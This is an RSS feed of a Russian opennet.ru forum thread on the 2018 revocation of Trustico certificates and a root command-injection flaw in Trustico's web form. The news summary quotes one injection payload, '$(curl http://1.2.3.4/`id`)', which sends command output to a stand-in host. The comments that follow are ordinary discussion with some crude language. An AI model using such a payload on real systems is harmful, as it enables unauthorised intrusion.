<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Ожидается отзыв всех остальных сертификатов Trustico из-за п...</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html</link>
    <description>Вчерашняя история (https://www.opennet.ru/opennews/art.shtml?num=48166) с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из пользователей сервиса обнаружил (https://twitter.com/cujanovic/status/969229397508153350) тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.&lt;br&gt;&lt;br&gt;&lt;br&gt;Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки  сертификата, то они будут исполнены на сервере с правами root. &lt;br&gt;&lt;br&gt;&lt;br&gt;Например, при вводе &quot;$(curl http://1.2.3.4/&#096;id&#096;)&quot; на указанный хост придёт запрос вида:&lt;br&gt;&lt;br&gt;&lt;br&gt;   1.2.3.4 - &#091;02/Mar/2018:09:52:14&#093; &quot;GET </description>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Аноним)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#56</link>
    <pubDate>Tue, 06 Mar 2018 00:23:10 GMT</pubDate>
    <description>Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :) &lt;br&gt;&lt;br&gt;Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Kuromi)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#55</link>
    <pubDate>Mon, 05 Mar 2018 03:05:07 GMT</pubDate>
    <description>&amp;gt; А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов &lt;br&gt;&amp;gt; от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация &lt;br&gt;&amp;gt; не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка &lt;br&gt;&amp;gt; - в мае.&lt;br&gt;&amp;gt; Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов &lt;br&gt;&amp;gt; на затронутых сайтах, наконец-то.&lt;br&gt;&lt;br&gt;И, само смешное, спустя пару дней включили назад. &lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Dmitry77)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#54</link>
    <pubDate>Sat, 03 Mar 2018 21:35:47 GMT</pubDate>
    <description>Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это  заплатка которая плохо держится.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Аноним)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#53</link>
    <pubDate>Sat, 03 Mar 2018 15:07:07 GMT</pubDate>
    <description>непонял, это как: &quot;запретить взламывать&quot; или &quot;запретить быть взламываемыми&quot;?&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Kuromi)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#52</link>
    <pubDate>Sat, 03 Mar 2018 14:42:35 GMT</pubDate>
    <description>А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.&lt;br&gt;Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Аноним)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#49</link>
    <pubDate>Sat, 03 Mar 2018 10:44:09 GMT</pubDate>
    <description>&amp;gt; Вот даже интересно после появление Let&apos;s Encrypt пошла какая то полоса неудач &lt;br&gt;&amp;gt; у всех остальных сертификаторов......прям совпадение.....&lt;br&gt;&lt;br&gt;Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Аноним)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#48</link>
    <pubDate>Sat, 03 Mar 2018 10:42:09 GMT</pubDate>
    <description>Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Аноним)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#47</link>
    <pubDate>Sat, 03 Mar 2018 10:28:28 GMT</pubDate>
    <description>Всем кто смеет хреново работать и раздолбайствовать.&lt;br&gt;</description>
</item>

<item>
    <title>Ожидается отзыв всех остальных сертификатов Trustico из-за п... (Тот_Самый_Анонимус)</title>
    <link>https://ns.opennet.ru/openforum/vsluhforumID3/113715.html#46</link>
    <pubDate>Sat, 03 Mar 2018 08:41:59 GMT</pubDate>
    <description>В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.&lt;br&gt;</description>
</item>

</channel>
</rss>
